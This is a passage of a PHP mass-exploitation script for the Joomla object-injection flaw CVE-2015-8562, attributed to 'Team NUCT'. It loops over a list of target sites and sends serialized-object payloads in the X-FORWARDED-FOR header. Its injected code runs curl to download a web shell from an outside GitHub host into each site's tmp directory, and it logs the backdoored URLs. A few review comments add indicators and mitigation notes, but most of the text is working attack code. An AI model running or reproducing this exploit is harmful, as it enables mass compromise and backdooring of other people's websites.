| _SERVER["SCRIPT_FILENAME"] | ';
/**
 * Print the tool's identification banner to standard output.
 *
 * The banner names the targeted issue (CVE-2015-8562) and the public
 * exploit-db entry this script says it derives from. It takes no
 * parameters and returns nothing; the only effect is the echoed text.
 */
function banner()
{
    // Same rule line is printed above and below the text rows.
    $rule = "\t================================================================\n";
    $rows = array(
        "\t Exploit Bug Joomla CVE-2015-8562 \n",
        "\t Coded By Team NUCT \n",
        "\t Author : The Jackerz \n",
        "\t Visit : http://0day.nuct.or.id \n",
        "\t Original Exploit : https://www.exploit-db.com/exploits/38977 \n",
    );

    echo $rule;
    foreach ($rows as $row) {
        echo $row;
    }
    echo $rule;
}
/**
 * Print the two-line command-line usage text.
 *
 * The script name shown in the text is taken from $_SERVER["PHP_SELF"].
 * The single expected argument is a file listing the sites to process.
 */
function how_to()
{
    $script = $_SERVER["PHP_SELF"];
    $usage = array(
        "How to Use : php " . $script . " list_target_joomla\n",
        "Example : php " . $script . " list.txt\n",
    );
    echo implode("", $usage);
}
/**
 * Re-express a string as a chain of PHP chr(N) calls joined by ".".
 *
 * Each byte of $char becomes "chr(<decimal byte value>)"; the pieces are
 * concatenated with "." so the result is a PHP expression that evaluates
 * back to the original string. Elsewhere in this file the result is
 * wrapped in "eval(...)".
 *
 * Review note: a long run of "chr(N).chr(N)..." inside request data is a
 * recognisable pattern when examining traffic or logs for this kind of
 * encoded PHP.
 *
 * @param string $char Text to encode, read byte by byte.
 * @return string The "chr(..).chr(..)" expression.
 */
function generate_payload($char)
{
    $last = strlen($char) - 1;
    $parts = array();
    $idx = 0;

    // Every byte before the final one.
    while ($idx < $last) {
        $parts[] = "chr(" . ord($char[$idx]) . ")";
        $idx++;
    }

    // The final byte is always read, even when the loop did not run.
    $parts[] = "chr(" . ord($char[$idx]) . ")";

    return implode(".", $parts);
}
/**
 * Record one result URL in the local file "joomla_backdoor.txt".
 *
 * The text handed to fwrite() is
 *   "http://" . $site . "/tmp/" . trim($nama_shell) . "\n"
 * after the whole string has been passed through trim().
 *
 * Review note: this file is written in the tool's working directory, not on
 * the remote site. On a seized or analysed operator machine it is a list of
 * hosts the tool recorded, which is useful for scoping and victim
 * notification.
 *
 * @param mixed $site       Site value concatenated after "http://".
 * @param mixed $nama_shell File name concatenated after "/tmp/" (trimmed first).
 */
function export_ke_file($site,$nama_shell)
{
// The mode argument is written as the bare word a, not as a quoted string.
$buka = fopen("joomla_backdoor.txt", a);
// The outer trim() covers the complete string, including the trailing "\n".
fwrite($buka,trim("http://".$site."/tmp/".trim($nama_shell)."\n"));
fclose($buka);
}
/**
 * Open the local file "joomla_backdoor.txt" and close it again at once.
 *
 * Nothing is written. The script calls this once at start-up, before the
 * target list is read — presumably to start each run with an empty results
 * file; confirm against the PHP version in use.
 */
function new_file()
{
// The mode argument is written as the bare word w, not as a quoted string.
$buka = fopen("joomla_backdoor.txt", w);
fclose($buka);
}
/**
 * Print the closing marker lines of a run to standard output.
 *
 * No parameters, no return value; output only.
 */
function end_checking()
{
    $closing = " |\n[*] End Exploit\n";
    print($closing);
}
// ---- Script entry: argument check and target-list loading ----
// Reads the file named by $list, splits its contents on "\n" and leaves the
// entries in $sites for the per-site loop that follows.
// NOTE(review): $list is not assigned in the visible part of this file;
// presumably it is set from $argv[1] earlier — confirm.
//
// Defender context, taken from the loop that follows in this file:
//  * every entry receives HTTP requests to http://<entry>/ whose
//    X-FORWARDED-FOR request header carries a PHP-serialized object string;
//  * the second stage tries to place a file named nuct.php in the tmp/
//    directory under the Joomla root.
// Indicators visible in this file: header values containing
// "JDatabaseDriverMysqli", "disconnectHandlers" or "eval(chr(", and an
// unexpected nuct.php in a site's tmp/ directory.
// Mitigation: run a Joomla release patched for CVE-2015-8562 and deny PHP
// execution in tmp/.

// No first command-line argument: show usage and stop.
if (!$argv[1])
{
how_to();
exit;
}
// Touch the local results file before any site is processed.
new_file();
$buka=fopen("$list","r");
$size=filesize("$list");
// A zero or failed size is treated as "empty list": show usage and stop.
if (empty($size))
{
how_to();
echo "File ".$argv[1]." empty\n";
exit;
}
// Read the whole list in one call and split it into one entry per line.
$read=fread($buka,$size);
$sites = explode("\n", $read);
banner();
foreach($sites as $site)
{
if ($site == "http://"+$site)
{
$site = preg_replace("'http://'", '', $site);
}
echo "\n[+] Site : http://".$site;
echo "\n";
echo "[*] Try Get Path Joomla\n";
//get cookies (saved to cookies.txt)
$ch =
curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$site/");
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_USERAGENT, $User_Agent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies.txt");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_exec($ch);
curl_close($ch);
for ($i=0;$i<2;$i++)
{
$ch =
curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$site/");
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_USERAGENT, $User_Agent);
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
curl_setopt($ch, CURLOPT_HTTPHEADER, array("X-FORWARDED-FOR: $payload_phpinfo"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$php_info_mentah = curl_exec($ch);
curl_close($ch);
}
//Upload shell
$php_info = explode($SCRIPT_FILENAME,$php_info_mentah);
$path_root_joomla = explode('index.php | ', $php_info[1]);
echo " |\n |=>[+] Path Joomla : ".$path_root_joomla[0]."\n";
echo " |\n[*] Try to upload shell/backdoor\n";
$generate_payload = generate_payload("system('curl https://raw.githubusercontent.com/thejackerz/backdoor/master/indoxploit.txt -o ".$path_root_joomla[0]."tmp/nuct.php && ls ".$path_root_joomla[0]."tmp | grep nuct.php');");
$backdoor = "eval(".$generate_payload.");JFactory::getConfig();exit";
$payload_terakhir=' }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:'.strlen($backdoor).':"'.$backdoor.'";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}����';
$ch =
curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$site/");
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_USERAGENT, $User_Agent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies.txt");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_exec($ch);
curl_close($ch);
for ($i=0;$i<2;$i++)
{
$ch =
curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$site/");
curl_setopt($ch, CURLOPT_TIMEOUT, 20);
curl_setopt($ch, CURLOPT_USERAGENT, $User_Agent);
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
curl_setopt($ch, CURLOPT_HTTPHEADER, array("X-FORWARDED-FOR: $payload_terakhir"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$hasil_akhir_mentah = curl_exec($ch);
curl_close($ch);
}
$hasil_akhir = explode('